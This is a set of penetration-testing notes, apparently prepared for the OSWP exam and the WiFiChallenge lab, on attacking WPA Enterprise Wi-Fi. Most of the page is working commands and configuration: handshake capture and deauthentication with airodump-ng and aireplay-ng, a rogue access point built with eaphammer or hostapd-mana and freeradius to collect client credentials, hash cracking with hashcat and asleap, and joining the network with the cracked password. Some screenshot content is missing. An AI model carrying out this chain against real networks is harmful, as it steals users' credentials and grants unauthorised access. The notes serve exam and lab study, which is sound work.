WPA Enterpise (WPA-MGT)
1. Finding WPA-MGT networks
You can find these on the 2.4ghz and 5ghz signals:
# dump 2.4ghz
sudo airodump-ng wlan0mon
# dump 5ghz
sudo airodump-ng -b a wlan0mon
In the "auth" column of airodump-ng, check for "MGT".

2. Finding the certificate information
To attack WPA Enterprise we build build our own rogue AP, but to do so, we need to create a certificate. We need to make the certificate with the same information as our target. To capture the information, we need to capture a handshake like in WPA2 attacks.
Use airodump-ng to capture the handshake:
sudo airodump-ng wlan0mon --bssid F0:9F:C2:71:22:15 -c 44 -w wpamgt
Do a deauth attack:
sudo aireplay-ng -0 5 -c 64:32:A8:07:6C:40 -a F0:9F:C2:71:22:15 wlan0mon
If successful, you will see "WPA handshake: X"

Open the wpamgt.cap file with WireShark and set the filter to tls.handshake.certificate:

Now extract the certificate with:

Save it as "cert.der" and extract the info using:
openssl x509 -inform der -in cert.der -text
The info we need:

3. Setting up Rogue AP
To attack a mistrusted client on an MGT network we have to create a RogueAP with the same ESSID and configuration but with a self-signed certificate, preferably with the same data as the real one in case the client manually verifies the certificate. To do this you can use “eaphammer”.
eaphammer is not allowed on the OSWP exam, instead use freeradius with hostapd-mana.
python3 ./eaphammer --cert-wizard

When this is completed, setup hostapd-mana with:
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced

3.1 Using freeradius with hostapd-mana
First of all, install freeradius
sudo apt-get install freeradius
Go to /etc/freeradius/3/certs and open ca.cnf and server.cnf
Modify the underneath values to the obtained information from the certificate:


After that we do the following commands under /etc/freeradius/3.0/certs
to generate Diffie Hellman key
for hostapd-mana
rm dh
make

Next, create a file called mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
After that we create a fake access point by creating a file called network.conf
under any other directory:
ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211
channel=<channel>
hw_mode=a # use 'g' for 5ghz networks
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
Make sure to point the mana.easp_user file to the right directory. Use hostapd-mana to setup the fake AP:
sudo hostapd-mana network.conf
4. Broadcast deauth to all AP's
With “airodump-ng” we detect the MAC of the clients to perform a deauthentication attack. So we do this attack on both clients in parallel. As there are 2 APs we have to perform the attack against the 2 APs, since disconnecting from 1 may connect to the other instead of to our RogueAP..
sudo iwconfig wlan0mon channel 44
Next we sent a broadcast deauth to both AP's while our rogue AP is listening:
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan0mon
If succesful we receive a NETNTLM hash:

5. Crack the hash
hashcat -a 0 -m 5500 juan.tr::::673256730e43f7a67c712534e0970f86160487ce60e560bc:009f9888b8c646ec /root/rockyou-top100000.txt --force

5.1 Use asleap
If you cannot use hashcat you can use asleap to get the password instead:
asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst
6. Connect to network
Create a hostapd mana config:
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Connect:
wpa_supplicant -c network.conf -i <interface>
Get IP:
sudo dhclient wlan3
ip addr show wlan3
7. Sources
https://zeyadazima.com/notes/oswplaybook/#attacking-wpa-enterprise
https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#18-what-is-juans-wifi-corp-password
Last updated